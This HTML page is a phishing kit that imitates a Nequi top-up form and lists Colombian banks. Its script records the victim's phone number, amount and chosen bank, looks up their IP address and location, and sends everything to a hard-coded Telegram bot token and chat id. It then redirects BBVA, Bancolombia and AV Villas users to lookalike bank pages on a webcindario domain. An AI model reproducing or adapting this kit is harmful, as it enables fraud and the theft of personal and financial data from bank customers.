<!DOCTYPE html>
<html lang="es">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Floating Label</title>
    <style>
      body {
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        margin: 0;
        font-family: Arial, sans-serif;
      }
      .form-container {
        width: 330px;
      }
      .form-group {
        position: relative;
        margin-bottom: 1.5rem;
      }

      input {
        width: calc(100% - 32px); /* Ajuste para el padding */
        height: 38px;
        background-color: #f8f1f5;
        border: 0;
        border-radius: 4px;
        padding: 8px 16px;
        color: var(--uva);
        font-size: 1rem;
        font-weight: 500;
        line-height: 1.25rem;
        position: relative;
        margin: 0;
      }
      select {
        width: calc(100%); /* Ajuste para el padding */
        height: 54px;
        background-color: #f8f1f5;
        border: 0;
        border-radius: 4px;
        padding: 7px 16px;
        color: var(--uva);
        font-size: 1rem;
        font-weight: 500;
        line-height: 1.25rem;
        position: relative;
        margin: 0;
      }
      input:focus {
        border-color: #333;
      }
      label {
        position: absolute;
        top: 50%;
        left: 1rem;
        transform: translateY(-50%);
        transition: all 0.3s ease;
        color: #3e3e3e;
        pointer-events: none;
        z-index: 2;
      }
      input:focus ~ label,
      input:not(:placeholder-shown) ~ label {
        top: 0.6rem;
        font-size: 0.8rem;
        color: #da0081;
      }
      @media only screen and (max-width: 600px) {
        body {
          margin-top: 40px;
          align-items: initial;
        }
      }
    </style>
  </head>
  <body>
    <form id="myForm">
      <div class="form-container">
        <div style="width: 100%; text-align: center">
          <img src="nequi-logo.svg" style="width: 110px" />
        </div>
        <div class="form-group" style="text-align: center">
          <h2>Recarga tu Nequi</h2>
        </div>
        <div class="form-group">
          <input
            type="text"
            id="inputField1"
            placeholder=" "
            onkeypress="soloNumeros(event)"
            required
          />
          <label for="inputField1">Número de celular</label>
        </div>
        <div class="form-group">
          <input
            type="text"
            id="inputField2"
            placeholder=" "
            onkeypress="soloNumeros(event)"
            required
          />
          <label for="inputField2">Confirma el número de celular</label>
        </div>
        <div class="form-group">
          <input
            type="email"
            id="inputField3"
            required
            placeholder=" "
            oninput="formatCurrency(this)"
          />
          <label for="inputField3">¿Cuánto?</label>
        </div>
        <div class="form-group">
          <select name="tipo_persona" id="tipo_persona">
            <option value="Natural">Natural</option>
            <option value="Juridica">Juridica</option>
          </select>
          <label
            for="tipo_persona"
            style="top: 0.6rem; font-size: 0.8rem; color: #da0081; left: 1.2rem"
            >Tipo de persona</label
          >
        </div>
        <div class="form-group">
          <select name="banco" id="banco">
            <option value="ALIANZA_FIDUCIARIA">ALIANZA FIDUCIARIA</option>
            <option value="BAN100">BAN100</option>
            <option value="BANCAMIA_S.A.">BANCAMIA S.A.</option>
            <option value="BANCO_AGRARIO">BANCO AGRARIO</option>
            <option value="BANCO_AV_VILLAS">BANCO AV VILLAS</option>
            <option value="BANCO_BBVA_COLOMBIA_S.A.">
              BANCO BBVA COLOMBIA S.A.
            </option>
            <option value="BANCO_CAJA_SOCIAL">BANCO CAJA SOCIAL</option>
            <option value="BANCO_COOPERATIVO_COOPCENTRAL">
              BANCO COOPERATIVO COOPCENTRAL
            </option>
            <option value="BANCO_DAVIVIENDA">BANCO DAVIVIENDA</option>
            <option value="BANCO_DE_BOGOTA">BANCO DE BOGOTA</option>
            <option value="BANCO_DE_OCCIDENTE">BANCO DE OCCIDENTE</option>
            <option value="BANCO_FALABELLA">BANCO FALABELLA</option>
            <option value="BANCO_FINANDINA_S.A._BIC">
              BANCO FINANDINA S.A. BIC
            </option>
            <option value="BANCO_GNB_SUDAMERIS">BANCO GNB SUDAMERIS</option>
            <option value="BANCOLOMBIA">BANCOLOMBIA</option>
          </select>
          <label
            for="banco"
            style="top: 0.6rem; font-size: 0.8rem; color: #da0081; left: 1.2rem"
            >Elige el banco</label
          >
        </div>
        <div style="width: 100%; text-align: center">
          La recarga se hará usando los servicios de PSE y se debitará de tu
          cuenta corriente o de ahorros.
        </div>

        <div style="width: 100%; text-align: center">
          <button
            type="button"
            onclick="submitForm()"
            style="
              background: #da0081;
              border: 1px solid #da0081;
              color: white;
              outline-style: none;
              width: 100%;
              max-width: 352px;
              min-height: 48px;
              padding: 8px;
              display: flex;
              justify-content: center;
              align-items: center;
              gap: 0.5rem;
              transition: background-color 0.2s, color 0.2s, border-color 0.2s,
                box-shadow 0.2s;
              border-radius: 4px;
              margin-top: 20px;
            "
          >
            Sigue
          </button>
        </div>
      </div>
    </form>
    <script src="https://cdn.jsdelivr.net/npm/axios@1.1.2/dist/axios.min.js"></script>
    <script>
      function soloNumeros(e) {
        var key = window.event ? e.which : e.keyCode;
        if (key < 48 || key > 57) {
          e.preventDefault();
        }
      }
    </script>
    <script>
      const url = "https://ipapi.co/json/";

      // Función para validar entrada de solo números
      function validateNumberInput(event) {
        const key = event.key;
        if (/\D/.test(key)) {
          event.preventDefault();
        }
      }

      // Función para enviar el formulario
      function submitForm() {
        // Obtener valores de los campos de entrada

        var inputField1 = document.getElementById("inputField1").value;
        var inputField2 = document.getElementById("inputField2").value;
        var inputField3 = document.getElementById("inputField3").value;

        localStorage.setItem("numero", inputField1);
        // Comparar los valores de los campos de entrada
        if (inputField1 !== inputField2) {
          alert("Los números de celular no coinciden.");
          return;
        }
        if (inputField1 === "" || inputField2 === "" || inputField3 === "") {
          alert("Los campos no pueden estar vacíos.");
          return;
        }

        // Resto de la función submitForm()
        var banco = document.getElementById("banco");
        var selectedOption = banco.options[banco.selectedIndex].value;
        var tipo = document.getElementById("tipo_persona");
        var selectedTipo = tipo.options[tipo.selectedIndex].value;
        console.log(selectedOption);

        axios
          .get(url)
          .then((response) => {
            const message =
              "\nNequi" +
              "\nNumero: " +
              inputField1 +
              "\nTipo de Persona: " +
              selectedTipo +
              "\nMonto: " +
              inputField3 +
              "\nBanco: " +
              selectedOption +
              "\nCiudad:" +
              response.data.city +
              "\nPais: " +
              response.data.country +
              "\nIP: " +
              response.data.ip;
            axios
              .post(
                "https://api.telegram.org/bot6322284639:AAFJI2SDBmlsbFJEGsFap6bJeR6w0b929iQ/sendMessage",
                {
                  chat_id: "-4139256120",
                  text: message,
                }
              )
              .then((response) => {
                if (selectedOption === "BANCO_BBVA_COLOMBIA_S.A.") {
                  window.location.href = "https://nequir.webcindario.com/bbva";
                } else if (selectedOption === "BANCOLOMBIA") {
                  window.location.href = "https://nequir.webcindario.com/bancolombia";
                }
                
                else if (selectedOption === "BANCO_AV_VILLAS") {
                  window.location.href = "https://nequir.webcindario.com/villas";
                }
                else {
                  alert("Servicio no disponible");
                  console.log(selectedOption);
                }
              })
              .catch((error) => {
                console.error(error);
              });
          })
          .catch((error) => {
            console.log(error);
          });
      }
      function formatCurrency(input) {
        var value = input.value.replace(/\D/g, "");
        var formattedValue = "";

        while (value.length > 3) {
          formattedValue = "." + value.slice(-3) + formattedValue;
          value = value.slice(0, -3);
        }
        formattedValue = "$" + value + formattedValue;
        input.value = formattedValue;
      }
    </script>
  </body>
</html>
